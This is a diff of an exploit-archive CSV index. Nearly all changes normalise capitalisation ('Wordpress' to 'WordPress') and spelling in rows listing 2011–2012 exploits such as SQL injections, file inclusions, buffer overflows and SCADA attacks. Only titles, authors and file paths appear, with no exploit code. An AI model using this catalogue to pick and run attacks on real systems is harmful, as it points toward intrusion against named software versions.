Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 -17720,platforms/php/webapps/17720.txt,"Wordpress Photoracer plugin 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 +17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0 -17724,platforms/php/webapps/17724.txt,"Wordpress Js-appointment plugin 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17725,platforms/php/webapps/17725.txt,"Wordpress MM Forms Community plugin 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 -17728,platforms/php/webapps/17728.txt,"Wordpress Super CAPTCHA plugin 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17729,platforms/php/webapps/17729.txt,"Wordpress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17730,platforms/php/webapps/17730.txt,"Wordpress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17731,platforms/php/webapps/17731.txt,"Wordpress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 +17728,platforms/php/webapps/17728.txt,"WordPress Super CAPTCHA plugin 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 17736,platforms/php/webapps/17736.txt,"joomla simple file lister module 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0 -17737,platforms/php/webapps/17737.txt,"Wordpress Facebook Promotions plugin 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17738,platforms/php/webapps/17738.txt,"Wordpress Evarisk plugin 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17739,platforms/php/webapps/17739.txt,"Wordpress Profiles plugin 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17740,platforms/php/webapps/17740.txt,"Wordpress mySTAT plugin 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 -17748,platforms/php/webapps/17748.txt,"Wordpress SH Slideshow plugin 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17749,platforms/php/webapps/17749.txt,"Wordpress iCopyright(R) Article Tools plugin 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17750,platforms/php/webapps/17750.txt,"Wordpress Advertizer plugin 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17751,platforms/php/webapps/17751.txt,"Wordpress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0 -17755,platforms/php/webapps/17755.txt,"Wordpress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17756,platforms/php/webapps/17756.txt,"Wordpress Plugin audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17757,platforms/php/webapps/17757.txt,"Wordpress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17758,platforms/php/webapps/17758.txt,"Wordpress PureHTML plugin 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17759,platforms/php/webapps/17759.txt,"Wordpress Couponer plugin 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17760,platforms/php/webapps/17760.txt,"Wordpress grapefile plugin 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17761,platforms/php/webapps/17761.txt,"Wordpress Plugin image Gallery with slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17758,platforms/php/webapps/17758.txt,"WordPress PureHTML plugin 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17760,platforms/php/webapps/17760.txt,"WordPress grapefile plugin 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17761,platforms/php/webapps/17761.txt,"WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow",2011-08-31,Metasploit,windows,remote,0 -17763,platforms/php/webapps/17763.txt,"Wordpress Donation plugin 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17764,platforms/php/webapps/17764.txt,"Wordpress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17764,platforms/php/webapps/17764.txt,"WordPress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 -17767,platforms/php/webapps/17767.txt,"Wordpress SearchAutocomplete plugin 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow",2011-09-01,Metasploit,windows,local,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 -17771,platforms/php/webapps/17771.txt,"Wordpress VideoWhisper Video Presentation plugin 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 -17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 -17773,platforms/php/webapps/17773.txt,"Wordpress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 +17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 +17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 +17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 -17778,platforms/php/webapps/17778.txt,"Wordpress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 -17779,platforms/php/webapps/17779.txt,"Wordpress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 +17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 +17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,php,webapps,0 -17783,platforms/windows/local/17783.pl,"ZipX 1.71 - ZIP File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 -17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 +17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 +17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System - Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - SEH Overwrite",2011-09-06,blake,windows,local,0 -17789,platforms/php/webapps/17789.txt,"Wordpress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 -17790,platforms/php/webapps/17790.txt,"Wordpress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 -17791,platforms/php/webapps/17791.txt,"Wordpress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 +17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 +17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 +17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 17792,platforms/php/webapps/17792.txt,"PlaySms 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,php,webapps,0 -17793,platforms/php/webapps/17793.txt,"Wordpress SCORM Cloud plugin 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 -17794,platforms/php/webapps/17794.txt,"Wordpress Eventify - Simple Events plugin 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 -17796,platforms/windows/dos/17796.txt,"Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 -17797,platforms/php/webapps/17797.txt,"Wordpress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 -17798,platforms/php/webapps/17798.txt,"Wordpress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17796,platforms/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 +17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0 -17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbiraty File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 +17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",php,webapps,0 -17808,platforms/php/webapps/17808.txt,"Wordpress WP-Filebase Download Manager plugin 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 -17809,platforms/php/webapps/17809.txt,"Wordpress A to Z Category Listing plugin 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 17810,platforms/windows/remote/17810.rb,"BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 -17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 +17814,platforms/php/webapps/17814.txt,"WordPress Event Registration plugin 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0 -17816,platforms/php/webapps/17816.txt,"Wordpress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 +17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0 -17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 +17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authentication Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 @@ -15488,10 +15489,10 @@ id,file,description,date,author,platform,type,port 21785,platforms/windows/dos/21785.pl,"HCView - WriteAV Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,Metasploit,windows,remote,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,php,webapps,0 -17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 +17828,platforms/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 -17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 +17832,platforms/php/webapps/17832.txt,"WordPress Plugin E-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15499,37 +15500,37 @@ id,file,description,date,author,platform,type,port 17838,platforms/windows/dos/17838.txt,"Cogent DataHub 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17839,platforms/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 - Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 - Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 -17841,platforms/windows/dos/17841.txt,"DAQFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 +17841,platforms/windows/dos/17841.txt,"DaqFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection",2011-09-15,rgod,jsp,webapps,0 -17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 +17847,platforms/windows/local/17847.py,"Mini-stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution",2011-09-16,Metasploit,windows,remote,0 17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow",2011-09-17,Metasploit,windows,remote,0 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 -17858,platforms/php/webapps/17858.txt,"Wordpress Filedownload Plugin 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 -17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 -17857,platforms/php/webapps/17857.txt,"Wordpress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 -17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - .m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 +17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 +17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - 'edit.php' HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 +17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 +17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - '.m3u' Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow",2011-09-18,Metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC)",2011-09-18,loneferret,windows,dos,21 -17860,platforms/php/webapps/17860.txt,"Wordpress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17861,platforms/php/webapps/17861.txt,"Wordpress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17862,platforms/php/webapps/17862.txt,"Wordpress WPEasyStats Plugin 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17863,platforms/php/webapps/17863.txt,"Wordpress Annonces Plugin 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17864,platforms/php/webapps/17864.txt,"Wordpress Livesig Plugin 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17865,platforms/php/webapps/17865.txt,"Wordpress Disclosure Policy Plugin 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17866,platforms/php/webapps/17866.txt,"Wordpress Mailing List Plugin 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17867,platforms/php/webapps/17867.txt,"Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17868,platforms/php/webapps/17868.txt,"Wordpress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17860,platforms/php/webapps/17860.txt,"WordPress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17861,platforms/php/webapps/17861.txt,"WordPress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17862,platforms/php/webapps/17862.txt,"WordPress WPEasyStats Plugin 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17863,platforms/php/webapps/17863.txt,"WordPress Annonces Plugin 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17864,platforms/php/webapps/17864.txt,"WordPress Livesig Plugin 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17865,platforms/php/webapps/17865.txt,"WordPress Disclosure Policy Plugin 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17866,platforms/php/webapps/17866.txt,"WordPress Mailing List Plugin 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17867,platforms/php/webapps/17867.txt,"WordPress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17868,platforms/php/webapps/17868.txt,"WordPress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17869,platforms/php/webapps/17869.txt,"WordPress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 -17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0 -17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via 